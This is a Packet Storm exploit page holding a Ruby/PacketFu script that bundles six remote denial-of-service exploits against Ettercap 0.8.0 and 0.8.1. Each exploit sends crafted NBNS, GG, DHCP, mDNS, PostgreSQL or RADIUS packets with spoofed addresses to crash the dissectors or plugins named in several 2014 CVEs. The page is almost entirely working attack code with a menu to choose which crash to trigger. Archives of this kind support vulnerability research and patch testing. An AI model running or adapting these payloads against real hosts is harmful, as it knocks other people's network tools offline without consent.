exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ettercap 0.8.0 / 0.8.1 Denial Of Service

Ettercap 0.8.0 / 0.8.1 Denial Of Service
Posted Dec 20, 2014
Authored by Nick Sampanis

Ettercap versions 0.8.0 and 0.8.1 suffers from multiple denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability
advisories | CVE-2014-6395
SHA-256 | c2d3c37bbcf2c09b4172044c3ddf17cecc9c546ea8ab8c937287a9c6a36c57e6

Ettercap 0.8.0 / 0.8.1 Denial Of Service

Change Mirror Download
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub

require 'packetfu'
include PacketFu

if ARGV.count < 4
puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
puts "[-]Use valid mac for your interface, if you dont know"+
" victim's ip address use broadcast"
exit
end

def nbns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 137
u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
u.payload << "\x00\x20" #type
u.payload << "\x00\x01" #class
u.payload << "A"*1000 #pad
u.recalc
u.to_w(ARGV[3])
end
def gg_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 8074
u.payload = "\x15\x00\x00\x00" #gg_type
u.payload << "\xe8\x03\x00\x00" #gg_len
u.payload << "A"*1000
u.recalc
u.to_w(ARGV[3])
end
def dhcp_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[0]
u.ip_saddr = ARGV[1]
u.udp_src = 67
u.udp_dst = 4444
u.payload = "\x02"*236
u.payload << "\x63\x82\x53\x63"
u.payload << "\x35"
u.payload << "\x00\x05\x00"
u.payload << "\x51"
u.payload << "\x00" #size
u.payload << "A" * 3 #pad
u.recalc
u.to_w(ARGV[3])
end

def mdns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x06router\x05local\x00" #name
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.recalc
u.to_w(ARGV[3])
end
def mdns_dos_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x01"
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.payload << "A"*500
u.recalc
u.to_w(ARGV[3])
end

def pgsql_server
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[1]
u.ip_daddr = ARGV[0]
u.tcp_src = 5432
u.tcp_dst = 3333
u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end
def pgsql_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end

def pgsql_client_shell
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70"
u.payload << "\x00\x00\x03\xe9" #len
u.payload << "A"*1000
u.payload << "\x00"
u.recalc
u.to_w(ARGV[3])
end

def radius_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 1645
u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
u.recalc
u.to_w(ARGV[3])
end

puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()

case choice
when 1
puts "[+]Sending nbns packet.."
nbns_header
when 2
puts "[+]Sending client gg packet.."
gg_client
when 3
puts "[+]Sending dhcp packet.."
dhcp_header
when 4
puts "[+]Sending mdns packet.."
mdns_header
mdns_dos_header
when 5
puts "[+]Sending pgsql packet.."
pgsql_client
pgsql_server
pgsql_client_shell
when 6
puts "[+]Sending radius packet.."
radius_header
else
puts "[-]Unrecognized command "
end


Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close